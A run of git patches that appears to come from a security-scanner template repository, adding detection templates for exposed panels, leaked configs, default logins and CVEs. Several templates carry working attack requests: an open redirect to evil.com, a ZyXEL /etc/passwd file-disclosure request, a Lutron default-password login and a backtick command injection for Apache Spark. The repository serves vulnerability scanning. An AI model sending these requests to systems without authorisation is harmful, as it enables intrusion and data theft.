<8293321+ehsandeep@users.noreply.github.com> Date: Wed, 14 Dec 2022 11:57:06 +0530 Subject: [PATCH 0424/1133] matcher update --- cves/2018/CVE-2018-17422.yaml | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml index 487f59d925..d1a6a87da4 100644 --- a/cves/2018/CVE-2018-17422.yaml +++ b/cves/2018/CVE-2018-17422.yaml @@ -23,20 +23,15 @@ info: requests: - method: GET path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com' stop-at-first-match: true - matchers-condition: and matchers: - - type: word part: body words: - - "self.location = 'http://www.interact.sh'" - - - type: status - status: - - 200 + - "self.location = 'http://evil.com'" + - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" # Enhanced by md on 2022/10/13 From 8c8a2c26010d23a875d953c021431fc4772271f0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 14:14:26 +0530 Subject: [PATCH 0425/1133] Create lutron-default-login.yaml --- .../lutron/lutron-default-login.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 default-logins/lutron/lutron-default-login.yaml diff --git a/default-logins/lutron/lutron-default-login.yaml b/default-logins/lutron/lutron-default-login.yaml new file mode 100644 index 0000000000..a641e5b470 --- /dev/null +++ b/default-logins/lutron/lutron-default-login.yaml @@ -0,0 +1,34 @@ +id: lutron-default-login + +info: + name: Lutron Device Default Login + author: geeknik + severity: high + reference: + - https://www.lutron.com + - https://vulners.com/openvas/OPENVAS:1361412562310113206 + tags: default-login,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/login?login=lutron&password=lutron" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "LUTRON" + - "DeviceIP" + - "Get Database Info as XML" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 1d16c832b765eade2bde0841d191d37e2d2e5a1d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 14:46:47 +0530 Subject: [PATCH 0426/1133] Create pagespeed-detect.yaml --- technologies/pagespeed-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/pagespeed-detect.yaml diff --git a/technologies/pagespeed-detect.yaml b/technologies/pagespeed-detect.yaml new file mode 100644 index 0000000000..9a42a0632c --- /dev/null +++ b/technologies/pagespeed-detect.yaml @@ -0,0 +1,21 @@ +id: pagespeed-detect + +info: + name: Pagespeed Detection + author: geeknik + severity: info + metadata: + verified: "true" + shodan-query: "X-Mod-Pagespeed:" + tags: tech,pagespeed + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "X-Mod-Pagespeed:" From 7bd3904182e6ddbdf8537e8800872a1857541b5a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 14:49:56 +0530 Subject: [PATCH 0427/1133] Update pagespeed-detect.yaml --- technologies/pagespeed-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/pagespeed-detect.yaml b/technologies/pagespeed-detect.yaml index 9a42a0632c..c6692accbf 100644 --- a/technologies/pagespeed-detect.yaml +++ b/technologies/pagespeed-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: verified: "true" - shodan-query: "X-Mod-Pagespeed:" + shodan-query: "X-Mod-Pagespeed:" tags: tech,pagespeed requests: From ffe7382c6bd5f43b9014d75865f5389ec23d39ac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 15:03:01 +0530 Subject: [PATCH 0428/1133] Create sony-bravia-disclosure.yaml --- misconfiguration/sony-bravia-disclosure.yaml | 39 ++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 misconfiguration/sony-bravia-disclosure.yaml diff --git a/misconfiguration/sony-bravia-disclosure.yaml b/misconfiguration/sony-bravia-disclosure.yaml new file mode 100644 index 0000000000..99fe66474a --- /dev/null +++ b/misconfiguration/sony-bravia-disclosure.yaml @@ -0,0 +1,39 @@ +id: sony-bravia-disclosure + +info: + name: Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure + author: geeknik + severity: medium + description: | + The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information running on the device. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php + - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt + tags: sony,unauth,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/api/system' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"contentsServer":' + - '"networkInterfaces":' + - '"serverTime":' + - '"hostIp":' + condition: and + + - type: word + part: header + words: + - "text/plain" + - "application/json" + condition: or + + - type: status + status: + - 200 From 762e24b7b941dfecc63e18490403175e6b4d179f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 15:13:47 +0530 Subject: [PATCH 0429/1133] Create vernemq-status-page.yaml --- misconfiguration/vernemq-status-page.yaml | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/vernemq-status-page.yaml diff --git a/misconfiguration/vernemq-status-page.yaml b/misconfiguration/vernemq-status-page.yaml new file mode 100644 index 0000000000..40cea4dbca --- /dev/null +++ b/misconfiguration/vernemq-status-page.yaml @@ -0,0 +1,29 @@ +id: vernemq-status-page + +info: + name: VerneMQ Status Page + author: geeknik + severity: low + reference: + - https://github.com/vernemq/vernemq + tags: vernemq,misconfig,status + +requests: + - method: GET + path: + - '{{BaseURL}}/status' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'VerneMQ Status' + - 'Issues' + - 'Cluster Overview' + - 'Node Status' + condition: and + + - type: status + status: + - 200 From 72a4f807f6308a69cf8761fb173e79d4f907de6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 15:55:48 +0530 Subject: [PATCH 0430/1133] Create unauth-zwave-mqtt.yaml --- misconfiguration/unauth-zwave-mqtt.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/unauth-zwave-mqtt.yaml diff --git a/misconfiguration/unauth-zwave-mqtt.yaml b/misconfiguration/unauth-zwave-mqtt.yaml new file mode 100644 index 0000000000..2f1f6ca9be --- /dev/null +++ b/misconfiguration/unauth-zwave-mqtt.yaml @@ -0,0 +1,29 @@ +id: unauth-zwave-mqtt + +info: + name: Unauthenticated ZWave To MQTT Console + author: geeknik + severity: low + reference: + - https://github.com/OpenZWave/Zwave2Mqtt + metadata: + verified: "true" + shodan-query: title:"ZWave To MQTT" + tags: zwave,mqtt,health + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ZWave To MQTT' + - 'content="Zwavejs2Mqtt"' + condition: and + + - type: status + status: + - 200 From fdb21c1820fc76f77afe5a6a25acdc63906d58c6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 14 Dec 2022 11:36:22 +0100 Subject: [PATCH 0431/1133] Add files via upload --- exposed-panels/spark-panel.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/spark-panel.yaml diff --git a/exposed-panels/spark-panel.yaml b/exposed-panels/spark-panel.yaml new file mode 100644 index 0000000000..c57248d7b6 --- /dev/null +++ b/exposed-panels/spark-panel.yaml @@ -0,0 +1,33 @@ +id: spark-panel + +info: + name: SPARK Panel - Detect + author: righettod + severity: info + description: SPARK panel was detected + reference: + - https://www.hypeinnovation.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: html:"/apps/IMT/Html/" + tags: panel,spark + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "url=servlet/hype" + + - type: status + status: + - 200 From 317d0dc38356a1bb6fa32b7da61b94845a2acadc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 00:55:43 +0530 Subject: [PATCH 0432/1133] Update insecure-firebase-database.yaml --- misconfiguration/google/insecure-firebase-database.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/misconfiguration/google/insecure-firebase-database.yaml b/misconfiguration/google/insecure-firebase-database.yaml index bb269ae48f..40ce987534 100644 --- a/misconfiguration/google/insecure-firebase-database.yaml +++ b/misconfiguration/google/insecure-firebase-database.yaml @@ -32,6 +32,11 @@ requests: words: - '{"id":"insecure-firebase-database"}' + - type: word + part: header + words: + - "application/json" + - type: status status: - 200 From 4b0a3b14dd45b24a60020170c287fabad266e953 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 01:04:06 +0530 Subject: [PATCH 0433/1133] Create websheets-config.yaml --- exposures/configs/websheets-config.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/configs/websheets-config.yaml diff --git a/exposures/configs/websheets-config.yaml b/exposures/configs/websheets-config.yaml new file mode 100644 index 0000000000..348419cabd --- /dev/null +++ b/exposures/configs/websheets-config.yaml @@ -0,0 +1,28 @@ +id: websheets-config + +info: + name: Websheets Config File Exposure + author: geeknik + severity: low + reference: + - https://github.com/daveagp/websheets + tags: websheets,config,exposure,files + +requests: + - method: GET + path: + - '{{BaseURL}}/ws-config.json' + - '{{BaseURL}}/ws-config.example.json' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '"db-password":' + - '"db-database":' + condition: and + + - type: status + status: + - 200 From f48dd3523e6727f60e3bb2914353f5d1a9baa52e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 01:13:29 +0530 Subject: [PATCH 0434/1133] Create salesforce-credentials.yaml --- exposures/files/salesforce-credentials.yaml | 34 +++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposures/files/salesforce-credentials.yaml diff --git a/exposures/files/salesforce-credentials.yaml b/exposures/files/salesforce-credentials.yaml new file mode 100644 index 0000000000..30f65b0413 --- /dev/null +++ b/exposures/files/salesforce-credentials.yaml @@ -0,0 +1,34 @@ +id: salesforce-credentials + +info: + name: Salesforce Credentials Disclosure + author: geeknik + severity: unknown + reference: + - https://github.com/daveagp/websheets + tags: exposure,files,salesforce,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/js/salesforce.js' + - '{{BaseURL}}/salesforce.js' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'jsforce.Connection' + - 'conn.login' + - 'conn.query' + condition: and + + - type: word + part: header + words: + - "text/plain" + + - type: status + status: + - 200 From 9fe49d27f3e792bedbdf95af6ecc8b1dc59b9a3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 01:24:41 +0530 Subject: [PATCH 0435/1133] Create production-log.yaml --- exposures/logs/production-log.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 exposures/logs/production-log.yaml diff --git a/exposures/logs/production-log.yaml b/exposures/logs/production-log.yaml new file mode 100644 index 0000000000..a850457a1b --- /dev/null +++ b/exposures/logs/production-log.yaml @@ -0,0 +1,41 @@ +id: production-log + +info: + name: Production Log File Disclosure + author: geeknik + severity: low + metadata: + verified: "true" + github-query: filename:production.log Connecting to database specified by database.yml + tags: exposure,files,logs,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/log/production.log' + - '{{BaseURL}}/logs/production.log' + - '{{BaseURL}}/production.log' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'Connecting to database specified by database.yml' + + - type: word + part: header + words: + - 'text/html' + negative: true + + - type: status + status: + - 200 + + extractors: + - type: regex + name: last_modified + part: header + regex: + - 'Last-Modified:.*' From 38af9e6717cf1a592833f555136d1ee3128e5431 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 14:07:45 +0530 Subject: [PATCH 0436/1133] Update credential-exposure.yaml --- file/keys/credential-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 94a0bd6093..26000e60c2 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -718,3 +718,4 @@ file: - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" From 7f138159cf13dbb8f96c43547c7c5900519505a4 Mon Sep 17 00:00:00 2001 From: bigzeroo <39177268+bigzeroo@users.noreply.github.com> Date: Thu, 15 Dec 2022 17:56:30 +0800 Subject: [PATCH 0437/1133] Create mautic-Unauthorized-upgrade Unauthorized access to the mautic web page access http://x.x.x.x/upgrade.php Online upgrade, upgrade failure will cause mautic business interruption. --- mautic-Unauthorized-upgrade | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 mautic-Unauthorized-upgrade diff --git a/mautic-Unauthorized-upgrade b/mautic-Unauthorized-upgrade new file mode 100644 index 0000000000..3ef3fc8a29 --- /dev/null +++ b/mautic-Unauthorized-upgrade @@ -0,0 +1,34 @@ +id: mautic-Unauthorized-upgrade + +info: + name: Mautic Upgrade.php Exposure + author: huowuzhao + severity: high + description: | + Unauthorized access to the mautic web page access http://x.x.x.x/upgrade.php Online upgrade, upgrade failure will cause mautic business interruption. + metadata: + verified: true + tags: misconfig,mautic,upgrade + +requests: + - method: GET + path: + - '{{BaseURL}}/upgrade.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Upgrade Mautic' + - 'Click here to start upgrade' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From ee562e420d9623ffa7cf892d9c5ef2ed574ea116 Mon Sep 17 00:00:00 2001 From: EvergreenCartoons <113829980+EvergreenCartoons@users.noreply.github.com> Date: Thu, 15 Dec 2022 13:32:26 +0000 Subject: [PATCH 0438/1133] Create zyxel-exportlog-lfd.yaml --- .../zyxel/zyxel-exportlog-lfd.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml diff --git a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml new file mode 100644 index 0000000000..bfc4a5514c --- /dev/null +++ b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml @@ -0,0 +1,30 @@ +id: zyxel-exportlog-lfd + +info: + name: Multiple ZyXEL routers local file disclosure. + author: EvergreenCartoons + severity: critical + description: | + Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. + reference: + - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ + - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ + - https://github.com/rapid7/metasploit-framework/pull/17388 + tags: zyxel,lfd,msf + +requests: + - raw: + - | + GET /Export_Log?/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: */* + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From ab7e15245e388d34e200f3fb58c3ff4740e9aff9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 19:04:33 +0530 Subject: [PATCH 0439/1133] Add files via upload --- miscellaneous/sitemap-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 miscellaneous/sitemap-detect.yaml diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml new file mode 100644 index 0000000000..f5d0bf70d4 --- /dev/null +++ b/miscellaneous/sitemap-detect.yaml @@ -0,0 +1,28 @@ +id: sitemap-detect + +info: Detect Sitemap + name: + author: houdinis + severity: info + description: | + A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. + tags: misc,generic + +requests: + - method: GET + path: + - "{{BaseURL}}/sitemap.xml" + - "{{BaseURL}}/sitemap.xsl" + + matchers-condition: and + host-redirects: true + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sitemap" + - "Sitemap" + condition: or \ No newline at end of file From 22a4393d52c90c04119954bc22a6d2c2ec293711 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 19:07:21 +0530 Subject: [PATCH 0440/1133] Update sitemap-detect.yaml --- miscellaneous/sitemap-detect.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index f5d0bf70d4..f49341274e 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -1,11 +1,11 @@ id: sitemap-detect -info: Detect Sitemap - name: +info: + name: Detect Sitemap author: houdinis severity: info description: | - A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. + A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. tags: misc,generic requests: @@ -25,4 +25,4 @@ requests: words: - "sitemap" - "Sitemap" - condition: or \ No newline at end of file + condition: or From 0254e94690acdf09be5b1e75f5c29673f34f6255 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 19:10:12 +0530 Subject: [PATCH 0441/1133] Update sitemap-detect.yaml --- miscellaneous/sitemap-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index f49341274e..baaa2e741b 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -1,7 +1,7 @@ id: sitemap-detect info: - name: Detect Sitemap + name: Detect Sitemap author: houdinis severity: info description: | From 33afc71bb2b19e4002386f0c2fc114cea92c6d58 Mon Sep 17 00:00:00 2001 From: EvergreenCartoons <113829980+EvergreenCartoons@users.noreply.github.com> Date: Thu, 15 Dec 2022 13:40:38 +0000 Subject: [PATCH 0442/1133] fucking yamllint doing me over --- vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml index bfc4a5514c..8746ff45fe 100644 --- a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml +++ b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml @@ -5,7 +5,7 @@ info: author: EvergreenCartoons severity: critical description: | - Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. + Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ From 8cb89ed42f2a4cb80129f668cb662a38f0b9ddcb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 22:36:12 +0530 Subject: [PATCH 0443/1133] Add files via upload --- network/detection/mysql-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 network/detection/mysql-detect.yaml diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml new file mode 100644 index 0000000000..5ce90b9d47 --- /dev/null +++ b/network/detection/mysql-detect.yaml @@ -0,0 +1,25 @@ +id: mysql-detect + +info: + name: Mysql Detection + author: pussycat0x + severity: info + description: | + MySQL is a tool used to manage databases and servers, so while it's not a database, it's widely used in relation to managing and organising data in databases. + metadata: + verified: true + shodan-query: product:"MySQL" + tags: network,mysql,db + +network: + + - inputs: + - data: "\n" + host: + - "{{Hostname}}" + - "{{Host}}:3306" + matchers: + - type: word + words: + - "mysql" + condition: and \ No newline at end of file From 123fd36395eb33ed6c87ba5c8cd2848e149c6275 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 22:49:32 +0530 Subject: [PATCH 0444/1133] Tag -Update --- cves/2022/CVE-2022-25082.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 73b7b3ecec..86f6c9d801 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25082 cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce + tags: totolink,cve,cve2022,router,unauth,rce,iot requests: - raw: From 951fb550986e7f81fa6fabe099e55f2cb89f3397 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 23:38:21 +0530 Subject: [PATCH 0445/1133] Update and rename mautic-Unauthorized-upgrade to misconfiguration/unauth-mautic-upgrade.yaml --- .../unauth-mautic-upgrade.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) rename mautic-Unauthorized-upgrade => misconfiguration/unauth-mautic-upgrade.yaml (57%) diff --git a/mautic-Unauthorized-upgrade b/misconfiguration/unauth-mautic-upgrade.yaml similarity index 57% rename from mautic-Unauthorized-upgrade rename to misconfiguration/unauth-mautic-upgrade.yaml index 3ef3fc8a29..a92abfcb63 100644 --- a/mautic-Unauthorized-upgrade +++ b/misconfiguration/unauth-mautic-upgrade.yaml @@ -1,14 +1,13 @@ -id: mautic-Unauthorized-upgrade +id: unauth-mautic-upgrade info: - name: Mautic Upgrade.php Exposure + name: Unauthenticated Mautic Upgrade.php Exposure author: huowuzhao severity: high - description: | - Unauthorized access to the mautic web page access http://x.x.x.x/upgrade.php Online upgrade, upgrade failure will cause mautic business interruption. metadata: - verified: true - tags: misconfig,mautic,upgrade + verified: "true" + shodan-query: title:"Mautic" + tags: misconfig,unauth,mautic requests: - method: GET @@ -27,7 +26,7 @@ requests: - type: word part: header words: - - "text/html" + - 'text/html' - type: status status: From 26ac7ce24306848a526fc9c1a9cfe6ede8c2c0e2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 00:13:21 +0530 Subject: [PATCH 0446/1133] Update mikrotik-routeros.yaml --- .../mikrotik/mikrotik-routeros.yaml | 37 +++++++++++++++++-- 1 file changed, 34 insertions(+), 3 deletions(-) diff --git a/exposed-panels/mikrotik/mikrotik-routeros.yaml b/exposed-panels/mikrotik/mikrotik-routeros.yaml index 3aa007737e..3ae1cb44ef 100644 --- a/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -11,26 +11,57 @@ info: shodan-query: title:"RouterOS router configuration page" tags: panel,login,mikrotik -requests: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/cfg' - '{{BaseURL}}/graphs/' - stop-at-first-match: true matchers-condition: and + stop-at-first-match: true matchers: - type: word name: router part: body words: - 'If this device is not in your possession, please contact your local network administrator' + - '.mikrotik.com' - 'RouterOS router configuration page' condition: and + - type: status + status: + - 200 + + - type: word + name: router-old + part: body + words: + - 'mikrotik routeros > administration' + - 'Mikrotik Router' + - '<img src="/webcfg/' + - '<title>MikroTik RouterOS Managing Webpage' + condition: or + + - type: word + name: hotspot + part: body + words: + - 'Please log on to use the mikrotik hotspot service' + - 'mikrotik hotspot > login' + condition: and + + - type: word + name: mikrotik-httpproxy + part: header + words: + - "Server: mikrotik httpproxy" + extractors: - type: regex group: 1 regex: - - '

RouterOS (.+)

' + - "

RouterOS (.+)

" + - '
mikrotik routeros (.[0-9.]+) configuration page
' + - 'routeros (.[0-9.]+) ' + - 'MikroTik RouterOS (.[0-9.]+)' From e91252b017cc86ced1b370f3b4283ee0aab247e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 00:19:44 +0530 Subject: [PATCH 0447/1133] Update unauth-mautic-upgrade.yaml --- misconfiguration/unauth-mautic-upgrade.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-mautic-upgrade.yaml b/misconfiguration/unauth-mautic-upgrade.yaml index a92abfcb63..b9f68ed484 100644 --- a/misconfiguration/unauth-mautic-upgrade.yaml +++ b/misconfiguration/unauth-mautic-upgrade.yaml @@ -3,7 +3,7 @@ id: unauth-mautic-upgrade info: name: Unauthenticated Mautic Upgrade.php Exposure author: huowuzhao - severity: high + severity: unknown metadata: verified: "true" shodan-query: title:"Mautic" From ca4689db8d509c829e6d266be2a8e7bd679b449d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 00:26:18 +0530 Subject: [PATCH 0448/1133] reverted severity --- misconfiguration/unauth-mautic-upgrade.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-mautic-upgrade.yaml b/misconfiguration/unauth-mautic-upgrade.yaml index b9f68ed484..a92abfcb63 100644 --- a/misconfiguration/unauth-mautic-upgrade.yaml +++ b/misconfiguration/unauth-mautic-upgrade.yaml @@ -3,7 +3,7 @@ id: unauth-mautic-upgrade info: name: Unauthenticated Mautic Upgrade.php Exposure author: huowuzhao - severity: unknown + severity: high metadata: verified: "true" shodan-query: title:"Mautic" From 13f9a338d3c58a041c5db295b35d5409f0edfac2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 00:31:01 +0530 Subject: [PATCH 0449/1133] minor-update-fix-fp --- ...ortlog-lfd.yaml => unauth-lfd-zhttpd.yaml} | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) rename vulnerabilities/zyxel/{zyxel-exportlog-lfd.yaml => unauth-lfd-zhttpd.yaml} (67%) diff --git a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml similarity index 67% rename from vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml rename to vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index 8746ff45fe..04680ed0c1 100644 --- a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -1,16 +1,17 @@ -id: zyxel-exportlog-lfd +id: unauth-lfd-zhttpd info: - name: Multiple ZyXEL routers local file disclosure. + name: Unauthenticated Local File Disclosure in zhttpd author: EvergreenCartoons - severity: critical - description: | - Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. + severity: high reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ - https://github.com/rapid7/metasploit-framework/pull/17388 - tags: zyxel,lfd,msf + metadata: + verified: "true" + shodan-query: http.html:"VMG1312-B10D" + tags: misconfig,unauth,zyxel requests: - raw: @@ -18,6 +19,7 @@ requests: GET /Export_Log?/etc/passwd HTTP/1.1 Host: {{Hostname}} Accept: */* + matchers-condition: and matchers: - type: regex @@ -25,6 +27,11 @@ requests: regex: - "root:.*:0:0:" + - type: word + part: header + words: + - 'application/octet-stream' + - type: status status: - 200 From 0700edef95e8f2900a1babb63c69b993406d68d8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 00:36:40 +0530 Subject: [PATCH 0450/1133] Update CVE-2022-33891.yaml --- cves/2022/CVE-2022-33891.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index 18e4d8ae1a..8570dc7815 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -11,12 +11,12 @@ info: tags: cve,cve2022,apache,spark,authenticated variables: - command: "id" + command: "echo CVE-2022-33891 | rev" requests: - method: GET path: - - "{{BaseURL}}/doAs?='{{command}}'" + - '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`' matchers-condition: and matchers: @@ -24,8 +24,4 @@ requests: - type: word part: body words: - - "groups=" - - - type: status - status: - - 200 + - "19833-2202-EVC" From 87d7bde9dfa2f76ad8f0e16b35bd6568ccac87cb Mon Sep 17 00:00:00 2001 From: 